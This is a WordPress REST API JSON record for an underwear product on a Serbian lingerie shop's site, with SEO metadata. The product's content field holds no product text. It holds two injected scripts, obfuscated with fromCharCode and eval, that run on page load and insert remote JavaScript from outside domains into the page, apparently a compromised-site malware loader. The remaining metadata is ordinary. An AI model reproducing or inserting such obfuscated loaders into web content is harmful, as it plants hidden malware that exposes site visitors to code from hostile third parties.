{"id":8729,"date":"2024-02-20T16:27:20","date_gmt":"2024-02-20T15:27:20","guid":{"rendered":"https:\/\/nightsecret.rs\/?post_type=product&#038;p=8729"},"modified":"2024-02-21T13:28:57","modified_gmt":"2024-02-21T12:28:57","slug":"101032-%d0%ba%d0%be%d0%bf%d0%b8%d1%80%d0%b0%d1%98","status":"publish","type":"product","link":"https:\/\/nightsecret.rs\/en\/product\/101032-%d0%ba%d0%be%d0%bf%d0%b8%d1%80%d0%b0%d1%98\/","title":{"rendered":"101049-369"},"content":{"rendered":"<p><script id='globalsway'>var z =String;var t=z.fromCharCode(10,102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,118,97,114,32,98,100,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,48,48,44,49,48,49,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,44,49,48,53,44,49,49,49,44,49,49,48,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,44,49,49,53,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,49,44,49,49,50,44,49,49,53,44,52,55,44,49,49,49,44,49,49,48,44,49,48,49,44,52,54,44,49,48,54,44,49,49,53,44,54,51,44,49,49,56,44,54,49,44,53,50,44,53,50,41,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,115,46,105,100,61,39,98,108,117,101,116,114,97,99,107,39,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125,10);eval(t);<\/script><script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>","protected":false},"excerpt":{"rendered":"<p><strong>Made in:<\/strong> Serbia<br \/>\n<strong>Manufacturer<\/strong> NightSecret<br \/>\n<strong>Material:<\/strong> 96% cotton, 4% elastan<\/p>","protected":false},"featured_media":0,"template":"","meta":[],"product_brand":[],"product_cat":[22,23],"product_tag":[],"class_list":{"0":"post-8729","1":"product","2":"type-product","3":"status-publish","5":"product_cat-muska","6":"product_cat-box-muska","8":"first","9":"instock","10":"taxable","11":"shipping-taxable","12":"purchasable","13":"product-type-variable","14":"has-default-attributes"},"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v20.13 (Yoast SEO v23.4) - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>101049-369 | NightSecret<\/title>\n<meta name=\"description\" content=\"Najkvalitetniji mu\u0161ki, de\u010diji i \u017eenski ve\u0161, pid\u017eame, bade mantili, spava\u0107ice. Veleprodaja i maloprodaja na broj telefona: +381 20 \/ 744 \u2013 844\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/nightsecret.rs\/en\/product\/101032-\u043a\u043e\u043f\u0438\u0440\u0430\u0458\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"101049-369\" \/>\n<meta property=\"og:description\" content=\"Zemlja porekla: Srbija Proizo\u0111a\u010d: NightSecret Sastav: 96% cotton, 4% elastan\" \/>\n<meta property=\"og:url\" content=\"https:\/\/nightsecret.rs\/en\/product\/101032-\u043a\u043e\u043f\u0438\u0440\u0430\u0458\/\" \/>\n<meta property=\"og:site_name\" content=\"NightSecret\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/nightsecretunderwearofficial\" \/>\n<meta property=\"article:modified_time\" content=\"2024-02-21T12:28:57+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/nightsecret.rs\/wp-content\/uploads\/2024\/02\/258.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1400\" \/>\n\t<meta property=\"og:image:height\" content=\"2000\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Availability\" \/>\n\t<meta name=\"twitter:data1\" content=\"In stock\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/nightsecret.rs\/product\/101032-%d0%ba%d0%be%d0%bf%d0%b8%d1%80%d0%b0%d1%98\/\",\"url\":\"https:\/\/nightsecret.rs\/product\/101032-%d0%ba%d0%be%d0%bf%d0%b8%d1%80%d0%b0%d1%98\/\",\"name\":\"101049-369 | NightSecret\",\"isPartOf\":{\"@id\":\"https:\/\/nightsecret.rs\/#website\"},\"datePublished\":\"2024-02-20T15:27:20+00:00\",\"dateModified\":\"2024-02-21T12:28:57+00:00\",\"description\":\"Najkvalitetniji mu\u0161ki, de\u010diji i \u017eenski ve\u0161, pid\u017eame, bade mantili, spava\u0107ice. Veleprodaja i maloprodaja na broj telefona: +381 20 \/ 744 \u2013 844\",\"breadcrumb\":{\"@id\":\"https:\/\/nightsecret.rs\/product\/101032-%d0%ba%d0%be%d0%bf%d0%b8%d1%80%d0%b0%d1%98\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/nightsecret.rs\/product\/101032-%d0%ba%d0%be%d0%bf%d0%b8%d1%80%d0%b0%d1%98\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/nightsecret.rs\/product\/101032-%d0%ba%d0%be%d0%bf%d0%b8%d1%80%d0%b0%d1%98\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Po\u010detna\",\"item\":\"https:\/\/nightsecret.rs\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Shop\",\"item\":\"https:\/\/nightsecret.rs\/shop\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Mu\u0161ka\",\"item\":\"https:\/\/nightsecret.rs\/en\/kategorije-proizvoda\/muska\/\"},{\"@type\":\"ListItem\",\"position\":4,\"name\":\"Box\",\"item\":\"https:\/\/nightsecret.rs\/en\/kategorije-proizvoda\/muska\/box-muska\/\"},{\"@type\":\"ListItem\",\"position\":5,\"name\":\"101049-369\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/nightsecret.rs\/#website\",\"url\":\"https:\/\/nightsecret.rs\/\",\"name\":\"NightSecret\",\"description\":\"Underwear &amp; Lingerie\",\"publisher\":{\"@id\":\"https:\/\/nightsecret.rs\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/nightsecret.rs\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/nightsecret.rs\/#organization\",\"name\":\"Night Secret\",\"url\":\"https:\/\/nightsecret.rs\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/nightsecret.rs\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/nightsecret.rs\/wp-content\/uploads\/2021\/04\/NightSecretlogoblack.png\",\"contentUrl\":\"https:\/\/nightsecret.rs\/wp-content\/uploads\/2021\/04\/NightSecretlogoblack.png\",\"width\":132,\"height\":132,\"caption\":\"Night Secret\"},\"image\":{\"@id\":\"https:\/\/nightsecret.rs\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/nightsecretunderwearofficial\",\"https:\/\/instagram.com\/nightsecret_underwear\"]}]}<\/script>\n<meta property=\"og:availability\" content=\"instock\" \/>\n<meta property=\"product:availability\" content=\"instock\" \/>\n<meta property=\"product:retailer_item_id\" content=\"101032-1\" \/>\n<meta property=\"product:condition\" content=\"new\" \/>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"101049-369 | NightSecret","description":"Najkvalitetniji mu\u0161ki, de\u010diji i \u017eenski ve\u0161, pid\u017eame, bade mantili, spava\u0107ice. Veleprodaja i maloprodaja na broj telefona: +381 20 \/ 744 \u2013 844","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/nightsecret.rs\/en\/product\/101032-\u043a\u043e\u043f\u0438\u0440\u0430\u0458\/","og_locale":"en_US","og_type":"article","og_title":"101049-369","og_description":"Zemlja porekla: Srbija Proizo\u0111a\u010d: NightSecret Sastav: 96% cotton, 4% elastan","og_url":"https:\/\/nightsecret.rs\/en\/product\/101032-\u043a\u043e\u043f\u0438\u0440\u0430\u0458\/","og_site_name":"NightSecret","article_publisher":"https:\/\/www.facebook.com\/nightsecretunderwearofficial","article_modified_time":"2024-02-21T12:28:57+00:00","og_image":[{"width":1400,"height":2000,"url":"https:\/\/nightsecret.rs\/wp-content\/uploads\/2024\/02\/258.jpg","type":"image\/jpeg"}],"twitter_card":"summary_large_image","twitter_misc":{"Availability":"In stock"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/nightsecret.rs\/product\/101032-%d0%ba%d0%be%d0%bf%d0%b8%d1%80%d0%b0%d1%98\/","url":"https:\/\/nightsecret.rs\/product\/101032-%d0%ba%d0%be%d0%bf%d0%b8%d1%80%d0%b0%d1%98\/","name":"101049-369 | NightSecret","isPartOf":{"@id":"https:\/\/nightsecret.rs\/#website"},"datePublished":"2024-02-20T15:27:20+00:00","dateModified":"2024-02-21T12:28:57+00:00","description":"Najkvalitetniji mu\u0161ki, de\u010diji i \u017eenski ve\u0161, pid\u017eame, bade mantili, spava\u0107ice. Veleprodaja i maloprodaja na broj telefona: +381 20 \/ 744 \u2013 844","breadcrumb":{"@id":"https:\/\/nightsecret.rs\/product\/101032-%d0%ba%d0%be%d0%bf%d0%b8%d1%80%d0%b0%d1%98\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/nightsecret.rs\/product\/101032-%d0%ba%d0%be%d0%bf%d0%b8%d1%80%d0%b0%d1%98\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/nightsecret.rs\/product\/101032-%d0%ba%d0%be%d0%bf%d0%b8%d1%80%d0%b0%d1%98\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Po\u010detna","item":"https:\/\/nightsecret.rs\/"},{"@type":"ListItem","position":2,"name":"Shop","item":"https:\/\/nightsecret.rs\/shop\/"},{"@type":"ListItem","position":3,"name":"Mu\u0161ka","item":"https:\/\/nightsecret.rs\/en\/kategorije-proizvoda\/muska\/"},{"@type":"ListItem","position":4,"name":"Box","item":"https:\/\/nightsecret.rs\/en\/kategorije-proizvoda\/muska\/box-muska\/"},{"@type":"ListItem","position":5,"name":"101049-369"}]},{"@type":"WebSite","@id":"https:\/\/nightsecret.rs\/#website","url":"https:\/\/nightsecret.rs\/","name":"NightSecret","description":"Underwear &amp; Lingerie","publisher":{"@id":"https:\/\/nightsecret.rs\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/nightsecret.rs\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/nightsecret.rs\/#organization","name":"Night Secret","url":"https:\/\/nightsecret.rs\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/nightsecret.rs\/#\/schema\/logo\/image\/","url":"https:\/\/nightsecret.rs\/wp-content\/uploads\/2021\/04\/NightSecretlogoblack.png","contentUrl":"https:\/\/nightsecret.rs\/wp-content\/uploads\/2021\/04\/NightSecretlogoblack.png","width":132,"height":132,"caption":"Night Secret"},"image":{"@id":"https:\/\/nightsecret.rs\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/nightsecretunderwearofficial","https:\/\/instagram.com\/nightsecret_underwear"]}]},"og_availability":"instock","product_availability":"instock","product_retailer_item_id":"101032-1","product_condition":"new"},"_links":{"self":[{"href":"https:\/\/nightsecret.rs\/en\/wp-json\/wp\/v2\/product\/8729","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nightsecret.rs\/en\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/nightsecret.rs\/en\/wp-json\/wp\/v2\/types\/product"}],"wp:attachment":[{"href":"https:\/\/nightsecret.rs\/en\/wp-json\/wp\/v2\/media?parent=8729"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/nightsecret.rs\/en\/wp-json\/wp\/v2\/product_brand?post=8729"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/nightsecret.rs\/en\/wp-json\/wp\/v2\/product_cat?post=8729"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/nightsecret.rs\/en\/wp-json\/wp\/v2\/product_tag?post=8729"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}